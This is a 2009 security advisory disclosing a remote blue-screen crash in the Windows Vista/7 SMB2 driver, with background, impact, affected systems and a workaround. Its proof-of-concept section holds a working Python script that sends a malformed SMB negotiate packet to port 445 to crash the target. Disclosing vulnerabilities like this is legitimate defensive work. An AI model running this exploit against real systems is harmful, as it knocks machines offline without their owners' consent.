=============================================<br>- Release date: September 7th, 2009<br>- Discovered by: Laurent Gaffié<br>- Severity: Medium/High<br>=============================================<br><br>I. VULNERABILITY<br>
-------------------------<br>Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.<br><br>II. BACKGROUND<br>-------------------------<br>Windows vista and newer Windows comes with a new SMB version named SMB2.<br>
See: <a href="http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0">http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0</a><br>for more details.<br>
<br>III. DESCRIPTION<br>-------------------------<br>SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality.<br>The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used <br>
to identify the SMB dialect that will be used for futher communication.<br><br>IV. PROOF OF CONCEPT<br>-------------------------<br><br>Smb-Bsod.py:<br><br>#!/usr/bin/python<br># When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a <br>
# PAGE_FAULT_IN_NONPAGED_AREA <br><br>from socket import socket<br>from time import sleep<br><br>host = "IP_ADDR", 445<br>buff = (<br>"\x00\x00\x00\x90" # Begin SMB header: Session message<br>"\xff\x53\x4d\x42" # Server Component: SMB<br>
"\x72\x00\x00\x00" # Negociate Protocol<br>"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853<br>"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"<br>"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"<br>
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"<br>"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"<br>"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" <br>"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" <br>
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" <br>"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" <br>"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" <br>"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" <br>
"\x30\x30\x32\x00"<br>)<br>s = socket()<br>s.connect(host)<br>s.send(buff)<br>s.close() <br><br>V. BUSINESS IMPACT<br>-------------------------<br>An attacker can remotly crash without no user interaction, any Vista/Windows 7 machine with SMB enable.<br>
Windows Xp, 2k, are NOT affected as they dont have this driver.<br><br>VI. SYSTEMS AFFECTED<br>-------------------------<br>Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly Win Server 2008 <br>as it use the same SMB2.0 driver (not tested).<br>
<br>VII. SOLUTION<br>-------------------------<br>Vendor contacted, but no patch available for the moment.<br>Close SMB feature and ports, until a patch is provided.<br><br>VIII. REFERENCES<br>-------------------------<br>
<a href="http://microsoft.com">http://microsoft.com</a><br><br>IX. CREDITS<br>-------------------------<br>This vulnerability has been discovered by Laurent Gaffié <br>Laurent.gaffie{remove-this}(at)<a href="http://gmail.com">gmail.com</a><br>
<a href="http://g-laurent.blogspot.com/">http://g-laurent.blogspot.com/</a><br><br>X. LEGAL NOTICES<br>-------------------------<br>The information contained within this advisory is supplied "as-is"<br>with no warranties or guarantees of fitness of use or otherwise.<br>
I accept no responsibility for any damage caused by the use or<br>misuse of this information.<br>